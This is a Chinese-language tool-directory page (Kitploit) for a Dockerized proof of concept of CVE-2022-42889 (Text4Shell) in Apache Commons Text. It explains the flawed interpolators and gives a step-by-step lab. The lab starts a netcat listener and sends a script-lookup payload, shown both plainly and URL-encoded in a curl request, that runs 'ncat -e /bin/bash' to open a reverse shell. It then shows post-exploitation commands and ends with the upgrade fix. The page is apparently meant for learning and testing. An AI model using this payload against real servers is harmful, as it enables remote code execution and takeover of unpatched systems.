Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-42889-POC — 一个简单的 Docker 化应用程序,演示如何利用 CVE-2022-42889 漏洞。 | Kitploit
工具/GitHubGitHub/akshayithape-devops/cve-2022-42889-poc
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育Payload 开发实验室与实践
GitHubakshayithape-devops/cve-2022-42889-poc

CVE-2022-42889-POC

一个简单的 Docker 化应用程序,演示如何利用 CVE-2022-42889 漏洞。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
5143年前尚未审核
分享

CVE-2022-42889-POC

Apache Commons-Text 漏洞 CVE-2022-42889 的概念验证攻击代码。

问题是什么:

Apache Commons Text 支持变量插值,允许动态评估和扩展属性。插值的标准格式为 ${prefix:name},其中“prefix”用于定位实现插值的 org.apache.commons.text.lookup.StringLookup 实例。从版本 1.5 到 1.9,默认的 Lookup 实例包含的插值器可能导致任意代码执行或与远程服务器建立连接。这些插值器包括:

  • "script" — 使用 JVM 脚本执行引擎(javax.script)执行表达式
  • "dns" — 解析 DNS 记录
  • "url" — 从 URL(包括远程服务器)加载值 如果受影响的版本使用默认插值功能,并且使用了不受信任的配置值,则应用程序可能容易受到远程代码执行或意外与远程服务器连接的攻击。

受影响版本:

Apache Commons Text 版本 1.5 到 1.9

展示 CVE-2022-42889-POC 漏洞的逐步指南:

1. 使用 Docker 构建应用程序(终端标签页 1)

root@kitploit:~
docker build --tag=test/text4shell .

2. 运行应用程序(终端标签页 2)

root@kitploit:~
docker run -it -p 80:8080 --name text4shell test/text4shell

3. 打开新的终端标签页并运行以下命令(终端标签页 3)

root@kitploit:~
docker exec -it text4shell /bin/bash

4. 现在在本地系统上启动监听器以接收反弹 shell(终端标签页 4)

root@kitploit:~
nc -nlvp 8888

5. 测试应用程序(终端标签页 5)

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>

6. 现在测试攻击(终端标签页 5)

攻击可以通过传递一个字符串 \$\{prefix:name\}\ 来实现,其中前缀是前面提到的查找方式:${script:javascript:java.lang.Runtime.getRuntime().exec('ncat -e /bin/bash 172.17.0.1 8888')}

root@kitploit:~
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27ncat%20-e%20%2Fbin%2Fbash%20172.17.0.1%208888%27%29%7D

7. 转到终端标签页 3 并逐一执行以下命令

root@kitploit:~
pwd
cd /root
pwd
ls

8. 转到终端标签页 5 并逐一执行以下命令

root@kitploit:~
pwd
cd /root
pwd
ls
touch hacked.txt
ls

9. 转到终端标签页 3 并逐一执行以下命令

root@kitploit:~
pwd
ls

如果你能在终端标签页 3 中执行 ls 命令后看到 hacked.txt 文件,说明攻击已成功执行。

10. 关闭所有终端

如何修复此漏洞:

建议用户升级到 Apache Commons Text 1.10.0,该版本默认禁用了存在问题的插值器。

更多信息:

  • NVD-NIST
下载工具